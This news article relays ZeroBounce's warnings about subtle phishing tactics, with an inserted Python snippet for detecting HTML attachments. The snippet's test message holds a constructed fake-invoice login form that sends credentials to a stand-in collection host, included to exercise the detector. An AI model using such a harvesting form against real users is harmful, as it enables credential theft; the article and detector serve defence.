
Phishing attacks become harder to spot as hackers adapt tactics
The FBI's Internet Crime Report has highlighted that phishing remains the most prevalent cybercrime in the United States, with more than 193,000 complaints recorded in the past year.
According to cybersecurity specialists at ZeroBounce, while phishing continues to be widespread, attackers are rapidly refining their techniques and successfully evading detection by employing a range of subtle and lesser-known tactics.
Among the emerging strategies is the use of linkless phishing attacks. The typical warning sign—suspicious links or attachments—is absent in these instances. Instead, cybercriminals send brief, benign-seeming emails such as "Are you free for a quick call?" or "Can you help me with this task?" intended to spark real-time interactions through phone or further email correspondence.
Vlad Cristescu, Head of Cybersecurity at ZeroBounce, said, "People are trained to spot suspicious links, but attackers have adapted by removing them altogether. Once you reply, they continue the impersonation, usually posing as a colleague or executive. If something feels off, don't respond directly. Verify through another channel before engaging."
An increasing concern is the manipulation of multi-factor authentication (MFA) processes. Attackers who have stolen login details can send a flurry of MFA push notifications, hoping to overwhelm users. They may then impersonate IT staff via email, urging the user to approve a single login attempt to cease the alerts.
"This is psychological warfare more than technical trickery," explains Cristescu. "It exploits a user's frustration and trust in IT. If you're receiving multiple MFA prompts you didn't initiate, that's not a glitch – it's an attack. Pause, don't approve, and escalate it immediately."
ZeroBounce has also noted cybercriminals' growing reliance on HTML attachments. These files often appear as typical business documents—such as invoices or shared files—but once opened, they mimic login screens and harvest user credentials.
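A mail-filter style check for the HTML attachments described above, as an added example that is not part of the original article or any ZeroBounce tooling. It parses a raw message, finds HTML attachments and flags those that contain a password field; the sample message, the `scan_message` helper and the `quarantine`/`review` verdict names are constructed for illustration.

```python
from email import message_from_string, policy
from html.parser import HTMLParser

# Constructed sample (not real traffic): an "invoice" that is really a login form.
SAMPLE = """\
From: billing@example.com
To: user@example.com
Subject: Invoice 0425
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please see the attached invoice.
--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="Invoice_0425.html"

<html><body><form action="https://login.example.net/collect" method="post">
<input type="email" name="u"><input type="password" name="p">
</form></body></html>
--b1--
"""

class FormFinder(HTMLParser):
    """Counts password inputs and records where forms submit to."""
    def __init__(self):
        super().__init__()
        self.password_inputs, self.form_actions = 0, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")

def scan_message(raw):
    """Hypothetical helper: one finding per HTML attachment in a raw message."""
    findings = []
    for part in message_from_string(raw, policy=policy.default).iter_attachments():
        name = part.get_filename() or ""
        html_name = name.lower().endswith((".html", ".htm"))
        if part.get_content_type() != "text/html" and not html_name:
            continue  # not an HTML attachment by MIME type or file extension
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        f = FormFinder()
        f.feed(body)
        findings.append({"filename": name, "password_inputs": f.password_inputs,
                         "form_actions": f.form_actions,
                         "verdict": "quarantine" if f.password_inputs else "review"})
    return findings
```

An HTML attachment without a password field is still returned with a `review` verdict, since any unexpected HTML attachment deserves a second look.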
"Users think, 'It's just an HTML file, what harm could it do?'" Vlad Cristescu notes. "But one click can open a cloned login page that captures your credentials instantly. Companies should restrict HTML attachments unless essential, and users should treat unfamiliar HTML files the same way they'd treat a suspicious link - don't open it unless you're absolutely sure of the sender."
Another growing threat vector involves phishing attempts through calendar invitations. Instead of traditional email-based attacks, perpetrators are dispatching meeting invites containing malicious links, often embedded in the 'Join' button. Because these invitations integrate directly into users' calendars, they may not be scrutinised as closely as regular emails.
"Calendar invites carry this built-in credibility – they're not usually scrutinised like emails," Cristescu explains. "But if you're getting meeting requests from unknown senders, or vague event titles like 'Sync' or 'Project Review,' treat those just like a phishing email. Disable auto-accept where possible and review every invite manually before clicking anything."
ZeroBounce has warned that the sophistication of modern phishing attacks lies in their subtlety. They increasingly resemble ordinary business communications, making them harder to detect and more dangerous to recipients.
"The biggest risk today is overconfidence," warns Vlad Cristescu, Head of Cybersecurity at ZeroBounce. "No matter how experienced you are, if you stop questioning what lands in your inbox – or your calendar – you're vulnerable. Awareness must evolve as fast as the threats do. Always verify the sender's email address, ensure that any link you click matches the legitimate domain, and look out for subtle red flags like spelling errors or unusual formatting. These small checks can make the difference between staying secure and falling for a well-crafted scam."